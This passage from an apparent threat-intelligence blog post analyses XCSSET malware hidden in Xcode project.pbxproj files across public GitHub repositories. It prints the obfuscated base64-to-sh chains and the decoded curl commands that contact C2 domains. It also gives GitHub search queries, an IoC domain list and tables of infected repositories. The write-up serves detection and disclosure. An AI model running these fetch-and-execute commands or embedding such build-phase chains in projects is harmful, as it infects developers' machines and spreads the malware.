rel=\"noreferrer noopener nofollow\">Issue #6<\/a>, write-up by Mayank Joshi, September 2025.)<\/em> Two infected files:<\/p>\n\n\n\n<div>\n<style>\n  .adx-wrap {\n    font-family: 'Inter', sans-serif;\n    background: #ffffff;\n    border-radius: 16px;\n    border: 1px solid #e8eaf5;\n    max-width: 900px;\n    margin: 0 auto;\n    overflow: hidden;\n  }\n\n  .adx-topbar {\n    display: flex;\n    align-items: center;\n    justify-content: space-between;\n    padding: 12px 24px;\n    background: #f2f4fc;\n    border-bottom: 1px solid #e8eaf5;\n  }\n\n  .adx-topbar-left {\n    display: flex;\n    align-items: center;\n    gap: 8px;\n  }\n\n  .adx-dot { width: 10px; height: 10px; border-radius: 50%; }\n  .adx-dot-r { background: #FF5F57; }\n  .adx-dot-y { background: #FEBC2E; }\n  .adx-dot-g { background: #28C840; }\n\n  .adx-topbar-label {\n    font-size: 12px;\n    font-weight: 600;\n    color: #0F0063;\n    letter-spacing: 0.04em;\n    margin-left: 4px;\n    opacity: 0.5;\n  }\n\n  .adx-badge {\n    font-size: 11px;\n    font-weight: 600;\n    background: #fff0f0;\n    color: #e0433a;\n    border: 1px solid #f5c5c2;\n    border-radius: 6px;\n    padding: 2px 10px;\n  }\n\n  .adx-overflow {\n    overflow-x: auto;\n  }\n\n  .adx-table {\n    width: 100%;\n    border-collapse: collapse;\n    min-width: 680px;\n  }\n\n  .adx-table thead th {\n    background: #f2f4fc;\n    color: #0F0063;\n    font-size: 10px;\n    font-weight: 600;\n    letter-spacing: 0.12em;\n    text-transform: uppercase;\n    padding: 10px 24px;\n    text-align: left;\n    border-bottom: 1px solid #e8eaf5;\n    opacity: 0.45;\n  }\n\n  .adx-table tbody tr {\n    border-bottom: 1px solid #f0f2fa;\n    transition: background 0.15s;\n  }\n\n  .adx-table tbody tr:last-child {\n    border-bottom: none;\n  }\n\n  .adx-table tbody tr:hover {\n    background: #f7f8fd;\n  }\n\n  .adx-table td {\n    padding: 16px 24px;\n    vertical-align: middle;\n  }\n\n  \/* File *\/\n  .adx-file-dir {\n    
font-family: 'JetBrains Mono', monospace;\n    font-size: 11px;\n    color: #00A696;\n    line-height: 1.7;\n  }\n\n  .adx-file-name {\n    color: #0F0063;\n    font-weight: 500;\n  }\n\n  .adx-file-line {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 10px;\n    color: #00A696;\n    margin-top: 4px;\n    opacity: 0.7;\n  }\n\n  .adx-file-line span {\n    color: #A05DD2;\n    font-weight: 500;\n    opacity: 1;\n  }\n\n  \/* Chain *\/\n  .adx-chain {\n    display: flex;\n    align-items: center;\n    flex-wrap: wrap;\n    gap: 5px;\n  }\n\n  .adx-pill {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 11px;\n    border-radius: 6px;\n    padding: 3px 10px;\n    white-space: nowrap;\n    display: inline-flex;\n    align-items: center;\n    gap: 5px;\n  }\n\n  .adx-pill-echo {\n    background: #f2f4fc;\n    border: 1px solid #e8eaf5;\n    color: #0F0063;\n  }\n\n  .adx-pill-b64 {\n    background: #f7f2fc;\n    border: 1px solid #e8d9f5;\n    color: #A05DD2;\n  }\n\n  .adx-pill-sh {\n    background: #fff3f2;\n    border: 1px solid #ffd5d2;\n    color: #c0392b;\n    font-weight: 500;\n  }\n\n  .adx-pipe {\n    color: #e8eaf5;\n    font-size: 15px;\n    font-family: 'JetBrains Mono', monospace;\n  }\n\n  .adx-rep {\n    font-size: 10px;\n    background: #fdf5e6;\n    border: 1px solid #f0d9a0;\n    color: #a06000;\n    border-radius: 4px;\n    padding: 1px 5px;\n    font-family: 'JetBrains Mono', monospace;\n    font-weight: 600;\n  }\n\n  \/* Payload *\/\n  .adx-payload {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 11.5px;\n    background: #fafbff;\n    border: 1px solid #e8eaf5;\n    border-radius: 8px;\n    padding: 8px 14px;\n    line-height: 1.8;\n    white-space: nowrap;\n  }\n\n  .adx-p-cmd  { color: #0F0063; font-weight: 500; }\n  .adx-p-flag { color: #0F006388; }\n  .adx-p-dom  { color: #FF645A; font-weight: 500; border-bottom: 1px dashed #FF645A66; }\n  .adx-p-path { color: #00A696; }\n<\/style>\n<div 
class=\"adx-wrap\">\n  <div class=\"adx-topbar\">\n    <div class=\"adx-topbar-left\">\n      <div class=\"adx-dot adx-dot-r\"><\/div>\n      <div class=\"adx-dot adx-dot-y\"><\/div>\n      <div class=\"adx-dot adx-dot-g\"><\/div>\n      <span class=\"adx-topbar-label\">Suspicious findings<\/span>\n    <\/div>\n    <div class=\"adx-badge\">2 hits<\/div>\n  <\/div>\n  <div class=\"adx-overflow\">\n    <table class=\"adx-table\">\n      <thead>\n        <tr>\n          <th>File<\/th>\n          <th>Chain<\/th>\n          <th>Decoded payload<\/th>\n        <\/tr>\n      <\/thead>\n      <tbody>\n        <tr>\n          <td>\n            <div class=\"adx-file-dir\">example\/ios\/Runner.xcodeproj\/<span class=\"adx-file-name\">project.pbxproj<\/span><\/div>\n            <div class=\"adx-file-line\">line <span>290<\/span><\/div>\n          <\/td>\n          <td>\n            <div class=\"adx-chain\">\n              <span class=\"adx-pill adx-pill-echo\">echo VjJ4a1QySXl\u2026<\/span>\n              <span class=\"adx-pipe\">|<\/span>\n              <span class=\"adx-pill adx-pill-b64\">base64 -D <span class=\"adx-rep\">\u00d7 4<\/span><\/span>\n              <span class=\"adx-pipe\">|<\/span>\n              <span class=\"adx-pill adx-pill-sh\">sh<\/span>\n            <\/div>\n          <\/td>\n          <td>\n            <div class=\"adx-payload\">\n              <span class=\"adx-p-cmd\">curl<\/span><span class=\"adx-p-flag\"> -fskL -d p=xcode <\/span>https:\/\/<span class=\"adx-p-dom\">cdnroute.ru<\/span><span class=\"adx-p-path\">\/a<\/span>\n            <\/div>\n          <\/td>\n        <\/tr>\n        <tr>\n          <td>\n            <div class=\"adx-file-dir\">example\/macos\/Runner.xcodeproj\/<span class=\"adx-file-name\">project.pbxproj<\/span><\/div>\n            <div class=\"adx-file-line\">line <span>317<\/span><\/div>\n          <\/td>\n          <td>\n            <div class=\"adx-chain\">\n              <span class=\"adx-pill adx-pill-echo\">echo 
V2xkT2IySjV\u2026<\/span>\n              <span class=\"adx-pipe\">|<\/span>\n              <span class=\"adx-pill adx-pill-b64\">base64 -D <span class=\"adx-rep\">\u00d7 3<\/span><\/span>\n              <span class=\"adx-pipe\">|<\/span>\n              <span class=\"adx-pill adx-pill-sh\">sh<\/span>\n            <\/div>\n          <\/td>\n          <td>\n            <div class=\"adx-payload\">\n              <span class=\"adx-p-cmd\">curl<\/span><span class=\"adx-p-flag\"> -fskL -d p=xcode <\/span>https:\/\/<span class=\"adx-p-dom\">adobecdn.ru<\/span><span class=\"adx-p-path\">\/a<\/span>\n            <\/div>\n          <\/td>\n        <\/tr>\n      <\/tbody>\n    <\/table>\n  <\/div>\n<\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>The logic is the same across all three examples: a long base64 string is decoded several times in sequence, yielding a short command that fetches the actual malware from a C2 server via curl and executes it silently in the background (&gt;\/dev\/null 2&gt;&amp;1 &amp;).<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"selected-highlights\">Selected Highlights<\/h2>\n\n\n\n<p>Seven repositories stand out from the full list of 24.&nbsp;<\/p>\n\n\n\n<p>Each is notable for a specific reason: a C2 domain that links it to a known campaign, a commit timestamp within hours of this investigation, or context that makes the infection particularly hard to dismiss as someone else&#8217;s problem.<\/p>\n\n\n\n<div>\n<style>\n  .tbl-outer {\n    font-family: 'Inter', sans-serif;\n    background: #ffffff;\n    border-radius: 16px;\n    border: 1px solid #e8eaf5;\n    max-width: 900px;\n    margin: 0 auto;\n    overflow: hidden;\n  }\n\n  .tbl-header {\n    padding: 24px 28px 20px;\n    border-bottom: 1px solid #e8eaf5;\n    background: #fafbff;\n  }\n\n  .tbl-heading {\n    font-size: 18px;\n    font-weight: 700;\n    color: #0F0063;\n    line-height: 1.3;\n  }\n\n  .tbl-sub {\n    font-size: 
13px;\n    color: #4a4f7a;\n    margin-top: 4px;\n    line-height: 1.5;\n  }\n\n  .tbl-scroll {\n    overflow-x: auto;\n  }\n\n  .tbl-outer table {\n    width: 100%;\n    border-collapse: collapse;\n    min-width: 640px;\n  }\n\n  .tbl-outer thead th {\n    background: #f2f4fc;\n    color: #8b90b8;\n    font-size: 10px;\n    font-weight: 700;\n    letter-spacing: 0.12em;\n    text-transform: uppercase;\n    padding: 10px 20px;\n    text-align: left;\n    border-bottom: 1px solid #e8eaf5;\n    white-space: nowrap;\n  }\n\n  .tbl-outer tbody tr {\n    border-bottom: 1px solid #f0f2fa;\n    transition: background 0.15s;\n  }\n\n  .tbl-outer tbody tr:last-child {\n    border-bottom: none;\n  }\n\n  .tbl-outer tbody tr:hover {\n    background: #f7f8fd;\n  }\n\n  .tbl-outer td {\n    padding: 14px 20px;\n    vertical-align: top;\n  }\n\n  .tbl-repo {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 11.5px;\n    font-weight: 500;\n    color: #0F0063;\n    white-space: nowrap;\n  }\n\n  .tbl-repo-owner {\n    color: #8b90b8;\n    font-weight: 400;\n  }\n\n  .tbl-proj-tag {\n    display: inline-block;\n    font-size: 10px;\n    font-weight: 600;\n    letter-spacing: 0.05em;\n    padding: 2px 9px;\n    border-radius: 20px;\n    white-space: nowrap;\n  }\n\n  .tbl-proj-swift   { background: #fff0ef; color: #FF645A; }\n  .tbl-proj-flutter { background: #ede9fe; color: #A05DD2; }\n  .tbl-proj-macos   { background: #e8f7f5; color: #007a6e; }\n  .tbl-proj-ios     { background: #f0f1fc; color: #0F0063; }\n\n  .tbl-date {\n    font-size: 12px;\n    color: #4a4f7a;\n    white-space: nowrap;\n  }\n\n  .tbl-why {\n    font-size: 12.5px;\n    color: #4a4f7a;\n    line-height: 1.6;\n    max-width: 340px;\n  }\n\n  .tbl-why .c2 {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 11px;\n    color: #FF645A;\n    font-weight: 500;\n    border-bottom: 1px dashed #FF645A66;\n  }\n\n  .tbl-why .hl {\n    color: #0F0063;\n    font-weight: 600;\n  }\n\n  .tbl-why .nt 
{\n    color: #A05DD2;\n    font-weight: 500;\n  }\n<\/style>\n<div class=\"tbl-outer\">\n  <div class=\"tbl-header\">\n    <div class=\"tbl-heading\">Affected GitHub Repositories<\/div>\n    <div class=\"tbl-sub\">7 public projects found carrying active XCSSET payloads as of April 2026.<\/div>\n  <\/div>\n  <div class=\"tbl-scroll\">\n    <table>\n      <thead>\n        <tr>\n          <th>Repository<\/th>\n          <th>Project type<\/th>\n          <th>Date<\/th>\n          <th>Why it matters<\/th>\n        <\/tr>\n      <\/thead>\n      <tbody>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">usamajaved357\/<\/span>Breezy<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">SwiftUI<\/span><\/td>\n          <td><span class=\"tbl-date\">Mar 2026<\/span><\/td>\n          <td><div class=\"tbl-why\">C2 <span class=\"c2\">riggletoy.ru<\/span> \u2014 same domain as our live sample<\/div><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">xiaoyouPrince\/<\/span>XYDevTool<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-macos\">macOS tools<\/span><\/td>\n          <td><span class=\"tbl-date\">Apr 2026<\/span><\/td>\n          <td><div class=\"tbl-why\">C2 <span class=\"c2\">netcdndev.in<\/span> \u2014 <span class=\"hl\">new domain<\/span>, absent from all public IoC lists<\/div><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">rjkalola\/<\/span>OTMS-2.0-Flutter<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-flutter\">Flutter<\/span><\/td>\n          <td><span class=\"tbl-date\">Apr 2026<\/span><\/td>\n          <td><div class=\"tbl-why\">Committed <span class=\"nt\">one day before the inspection<\/span><\/div><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">NandaMocha\/<\/span>Reflect<\/span><\/td>\n          
<td><span class=\"tbl-proj-tag tbl-proj-swift\">Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">Feb 2026<\/span><\/td>\n          <td><div class=\"tbl-why\"><span class=\"hl\">82 commits<\/span> on top of the infection \u2014 <span class=\"nt\">the author was unaware<\/span><\/div><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">prodev-mob\/<\/span>screen-time-ios<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-ios\">iOS<\/span><\/td>\n          <td><span class=\"tbl-date\">Mar 2026<\/span><\/td>\n          <td><div class=\"tbl-why\">A screen-protection app, <span class=\"hl\">itself infected<\/span><\/div><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">dvillegastech\/<\/span>ReaxBD<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-flutter\">Flutter\/Dart<\/span><\/td>\n          <td><span class=\"tbl-date\">Oct 2025<\/span><\/td>\n          <td><div class=\"tbl-why\">20 stars; C2 <span class=\"c2\">cdnroute.ru<\/span>, <span class=\"c2\">adobecdn.ru<\/span> \u2014 analyzed above<\/div><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">MVP-Applications\/<\/span>qibla_flutter<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-flutter\">Flutter pkg<\/span><\/td>\n          <td><span class=\"tbl-date\">Feb 2026<\/span><\/td>\n          <td><div class=\"tbl-why\">Infection in <span class=\"hl\">example\/ios<\/span> \u2014 cloned as a dependency<\/div><\/td>\n        <\/tr>\n      <\/tbody>\n    <\/table>\n  <\/div>\n<\/div>\n<\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"running-the-search-independently\">Running the Search Independently<\/h2>\n\n\n\n<p>All queries below require an authenticated GitHub account. 
Run them as-is \u2013 no modification needed.<\/p>\n\n\n\n<div>\n<style>\n  .sq-outer {\n    font-family: sans-serif;\n    background: #ffffff;\n    border-radius: 16px;\n    border: 1px solid #e8eaf5;\n    max-width: 900px;\n    margin: 0 auto;\n    overflow: hidden;\n  }\n\n  .sq-block {\n    background: #fafbff;\n    overflow: hidden;\n  }\n\n  .sq-topbar {\n    display: flex;\n    align-items: center;\n    gap: 6px;\n    padding: 8px 14px;\n    background: #f2f4fc;\n    border-bottom: 1px solid #e8eaf5;\n  }\n\n  .sq-dot { width: 9px; height: 9px; border-radius: 50%; }\n  .sq-dot-r { background: #FF5F57; }\n  .sq-dot-y { background: #FEBC2E; }\n  .sq-dot-g { background: #28C840; }\n\n  .sq-code {\n    padding: 14px 20px;\n    overflow-x: auto;\n  }\n\n  .sq-code pre {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 12.5px;\n    line-height: 2;\n    white-space: pre;\n    margin: 0;\n  }\n\n  .sq-filter { color: #8b90b8; }\n  .sq-path   { color: #00A696; font-weight: 500; }\n  .sq-quote  { color: #c2c6e8; }\n  .sq-cmd    { color: #FF645A; font-weight: 500; }\n  .sq-pipe   { color: #A05DD2; font-weight: 500; }\n  .sq-flag   { color: #4a4f7a; }\n<\/style>\n<div class=\"sq-outer\">\n  <div class=\"sq-block\">\n    <div class=\"sq-topbar\">\n      <div class=\"sq-dot sq-dot-r\"><\/div>\n      <div class=\"sq-dot sq-dot-y\"><\/div>\n      <div class=\"sq-dot sq-dot-g\"><\/div>\n    <\/div>\n    <div class=\"sq-code\"><pre><span class=\"sq-filter\">path:<\/span><span class=\"sq-path\">project.pbxproj<\/span> <span class=\"sq-quote\">\"<\/span><span class=\"sq-cmd\">echo<\/span><span class=\"sq-quote\">\"<\/span> <span class=\"sq-quote\">\"<\/span><span class=\"sq-cmd\">base64<\/span> <span class=\"sq-flag\">-d<\/span> <span class=\"sq-pipe\">|<\/span> <span class=\"sq-cmd\">base64<\/span> <span class=\"sq-flag\">-d<\/span><span class=\"sq-quote\">\"<\/span>\n<span class=\"sq-filter\">path:<\/span><span class=\"sq-path\">project.pbxproj<\/span> <span 
class=\"sq-quote\">\"<\/span><span class=\"sq-cmd\">echo<\/span><span class=\"sq-quote\">\"<\/span> <span class=\"sq-quote\">\"<\/span><span class=\"sq-cmd\">xxd<\/span> <span class=\"sq-flag\">-p -r<\/span> <span class=\"sq-pipe\">|<\/span> <span class=\"sq-cmd\">xxd<\/span> <span class=\"sq-flag\">-p -r<\/span><span class=\"sq-quote\">\"<\/span>\n<span class=\"sq-filter\">path:<\/span><span class=\"sq-path\">project.pbxproj<\/span> <span class=\"sq-quote\">\"<\/span><span class=\"sq-cmd\">base64<\/span> <span class=\"sq-flag\">--decode<\/span> <span class=\"sq-pipe\">|<\/span> <span class=\"sq-cmd\">base64<\/span> <span class=\"sq-flag\">--decode<\/span> <span class=\"sq-pipe\">|<\/span> <span class=\"sq-cmd\">base64<\/span> <span class=\"sq-flag\">--decode<\/span><span class=\"sq-quote\">\"<\/span><\/pre><\/div>\n  <\/div>\n<\/div>\n<div>\n\n\n\n<p>IoC domain list for SOC alerting and DNS-level filtering (compiled from Joshi 2025, our live sample, and the findings above):<\/p>\n\n\n\n<div>\n<style>\n  .sq-outer {\n    font-family: sans-serif;\n    background: #ffffff;\n    border-radius: 16px;\n    border: 1px solid #e8eaf5;\n    max-width: 900px;\n    margin: 0 auto;\n    overflow: hidden;\n  }\n\n  .sq-block {\n    background: #fafbff;\n    overflow: hidden;\n  }\n\n  .sq-topbar {\n    display: flex;\n    align-items: center;\n    gap: 6px;\n    padding: 8px 14px;\n    background: #f2f4fc;\n    border-bottom: 1px solid #e8eaf5;\n  }\n\n  .sq-dot { width: 9px; height: 9px; border-radius: 50%; }\n  .sq-dot-r { background: #FF5F57; }\n  .sq-dot-y { background: #FEBC2E; }\n  .sq-dot-g { background: #28C840; }\n\n  .sq-code {\n    padding: 16px 20px;\n    overflow-x: auto;\n  }\n\n  .sq-domains {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 12.5px;\n    line-height: 2;\n    margin: 0;\n    display: flex;\n    flex-wrap: wrap;\n    gap: 6px 0;\n  }\n\n  .sq-domain {\n    color: #00A696;\n    font-weight: 500;\n    white-space: nowrap;\n  }\n\n  
.sq-sep {\n    color: #c2c6e8;\n    margin: 0 2px;\n  }\n<\/style>\n<div class=\"sq-outer\">\n  <div class=\"sq-block\">\n    <div class=\"sq-topbar\">\n      <div class=\"sq-dot sq-dot-r\"><\/div>\n      <div class=\"sq-dot sq-dot-y\"><\/div>\n      <div class=\"sq-dot sq-dot-g\"><\/div>\n    <\/div>\n    <div class=\"sq-code\">\n      <div class=\"sq-domains\">\n        <span class=\"sq-domain\">adobetrix.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">adobecdn.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">bulksec.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">cdnroute.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">checkcdn.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">diggimax.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">digichat.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">figmastars.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">fixmates.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">mdscache.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">rublenet.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">sigmanow.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">trinitysol.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">windsecure.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">castlenet.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">riggletoy.ru<\/span><span class=\"sq-sep\">,&nbsp;<\/span><span class=\"sq-domain\">netcdndev.in<\/span>\n      <\/div>\n    <\/div>\n  <\/div>\n<\/div>\n<\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>riggletoy.ru is the link between the public repositories and our live sample. 
netcdndev.in had not appeared in any prior research before this investigation.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"the-bigger-picture\">The Bigger Picture<\/h2>\n\n\n\n<p>This investigation started with a single anomalous osascript call. It ended with 24 infected repositories, a live C2 domain absent from every public threat intelligence feed, and a confirmed link between one workstation and an active GitHub distribution campaign.<\/p>\n\n\n\n<p>That escalation is not incidental \u2013 it is the design. XCSSET doesn&#8217;t need a broad reach. It needs one developer to clone one repository and hit Build. Everything after that is automatic. The 82 commits stacked on top of an undetected infection in NandaMocha\/Reflect illustrate what that looks like in practice: the developer kept working, kept shipping, and had no idea.<\/p>\n\n\n\n<p>Two details from this investigation go beyond what prior research documented.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>First, netcdndev.in, found in xiaoyouPrince\/XYDevTool, does not appear in any existing IoC list. The operators are rotating infrastructure faster than public feeds can track it.<\/li>\n<li>Second, riggletoy.ru links a live workstation infection directly to a public GitHub repository, meaning the distribution chain isn&#8217;t hypothetical. It ran. It may still be running.<\/li>\n<\/ul>\n\n\n<div class=\"block__bord\"><div class=\"block__bord_desc\"><p>The threat persists not because it&#8217;s technically sophisticated, but because it hides in the one artifact developers routinely share without reading: the build file. 
That&#8217;s the actual attack surface, and it&#8217;s been open for five years.<\/p>\n<\/div><\/div>\n<style>\n.block__bord { margin: 32px 0; padding: 1.25em 2.375em;\tborder-radius: 24px; background: rgba(0, 220, 200, 0.20); }\n.block__bord_desc {font-size: 16px !important;font-weight: 400 !important;color: #606060 !important;}\n<\/style>\n\n\n\n<p>For Adex, this isn&#8217;t adjacent to the core work \u2013 it is the core work. Fraud and malware share infrastructure, and the same compromised machine that spreads XCSSET through a developer&#8217;s repositories can silently drain ad platform accounts for months. We look for this because we have to. We publish it because others need to know.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"appendix-1-full-list-24-repositories\">Appendix #1: Full List (24 repositories)<\/h2>\n\n\n\n<p>Each repository below was inspected by hand: project.pbxproj was opened as plain text, the encoded string was extracted and decoded through the full iteration chain, and the resulting command was confirmed to contain a C2 call matching known XCSSET infrastructure. 
No automated scanner was used.<\/p>\n\n\n\n<div>\n<style>\n  .tbl-outer {\n    font-family: sans-serif;\n    background: #ffffff;\n    border-radius: 16px;\n    border: 1px solid #e8eaf5;\n    max-width: 900px;\n    margin: 0 auto;\n    overflow: hidden;\n  }\n\n  .tbl-header {\n    padding: 24px 28px 20px;\n    border-bottom: 1px solid #e8eaf5;\n    background: #fafbff;\n  }\n\n  .tbl-heading {\n    font-size: 18px;\n    font-weight: 700;\n    color: #0F0063;\n    line-height: 1.3;\n  }\n\n  .tbl-sub {\n    font-size: 13px;\n    color: #4a4f7a;\n    margin-top: 4px;\n    line-height: 1.5;\n  }\n\n  .tbl-scroll {\n    overflow-x: auto;\n  }\n\n  .tbl-outer table {\n    width: 100%;\n    border-collapse: collapse;\n    min-width: 480px;\n  }\n\n  .tbl-outer thead th {\n    background: #f2f4fc;\n    color: #8b90b8;\n    font-size: 10px;\n    font-weight: 700;\n    letter-spacing: 0.12em;\n    text-transform: uppercase;\n    padding: 10px 20px;\n    text-align: left;\n    border-bottom: 1px solid #e8eaf5;\n    white-space: nowrap;\n  }\n\n  .tbl-outer tbody tr {\n    border-bottom: 1px solid #f0f2fa;\n    transition: background 0.15s;\n  }\n\n  .tbl-outer tbody tr:last-child {\n    border-bottom: none;\n  }\n\n  .tbl-outer tbody tr:hover {\n    background: #f7f8fd;\n  }\n\n  .tbl-outer td {\n    padding: 12px 20px;\n    vertical-align: middle;\n  }\n\n  .tbl-repo {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 11.5px;\n    font-weight: 500;\n    color: #0F0063;\n    white-space: nowrap;\n  }\n\n  .tbl-repo-owner {\n    color: #8b90b8;\n    font-weight: 400;\n  }\n\n  .tbl-proj-tag {\n    display: inline-block;\n    font-size: 10px;\n    font-weight: 600;\n    letter-spacing: 0.05em;\n    padding: 2px 9px;\n    border-radius: 20px;\n    white-space: nowrap;\n  }\n\n  .tbl-proj-swift   { background: #fff0ef; color: #FF645A; }\n  .tbl-proj-flutter { background: #ede9fe; color: #A05DD2; }\n  .tbl-proj-macos   { background: #e8f7f5; color: #007a6e; }\n  
.tbl-proj-objc    { background: #f0f1fc; color: #0F0063; }\n  .tbl-proj-rn      { background: #fef3c7; color: #b45309; }\n  .tbl-proj-mixed   { background: #f5f0fc; color: #7c3aed; }\n\n  .tbl-date {\n    font-size: 12px;\n    color: #4a4f7a;\n    white-space: nowrap;\n  }\n\n  .tbl-date-none {\n    font-size: 12px;\n    color: #c2c6e8;\n    white-space: nowrap;\n  }\n<\/style>\n<div class=\"tbl-outer\">\n  <div class=\"tbl-header\">\n    <div class=\"tbl-heading\">Affected GitHub Repositories<\/div>\n    <div class=\"tbl-sub\">24 public projects found carrying active XCSSET payloads.<\/div>\n  <\/div>\n  <div class=\"tbl-scroll\">\n    <table>\n      <thead>\n        <tr>\n          <th>Repository<\/th>\n          <th>Type<\/th>\n          <th>Date<\/th>\n        <\/tr>\n      <\/thead>\n      <tbody>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">usamajaved357\/<\/span>Breezy<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">SwiftUI<\/span><\/td>\n          <td><span class=\"tbl-date\">March 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">xiaoyouPrince\/<\/span>XYDevTool<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-macos\">macOS Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">April 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">rjkalola\/<\/span>OTMS-2.0-Flutter<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-flutter\">Flutter<\/span><\/td>\n          <td><span class=\"tbl-date\">April 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">evaradating-art\/<\/span>evara-ios<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">April 2026<\/span><\/td>\n        <\/tr>\n    
    <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">Jayluu2202\/<\/span>Budget-Planner-Rewamped<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">SwiftUI<\/span><\/td>\n          <td><span class=\"tbl-date\">April 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">shankarsharma\/<\/span>Broking<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-objc\">Objective-C<\/span><\/td>\n          <td><span class=\"tbl-date\">April 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">prodev-mob\/<\/span>screen-time-ios<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">March 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">ktech643\/<\/span>AI-Auto-Attendance<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-flutter\">Flutter<\/span><\/td>\n          <td><span class=\"tbl-date\">March 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">Liqiankun\/<\/span>RepackIssueDemo<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-mixed\">JS + Flutter iOS<\/span><\/td>\n          <td><span class=\"tbl-date\">March 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">MVP-Applications\/<\/span>qibla_flutter<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-flutter\">Flutter<\/span><\/td>\n          <td><span class=\"tbl-date\">February 2026<\/span><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">Shohruhmirzo05\/<\/span>Salom-AI-Mobile<\/span><\/td>\n          <td><span class=\"tbl-proj-tag 
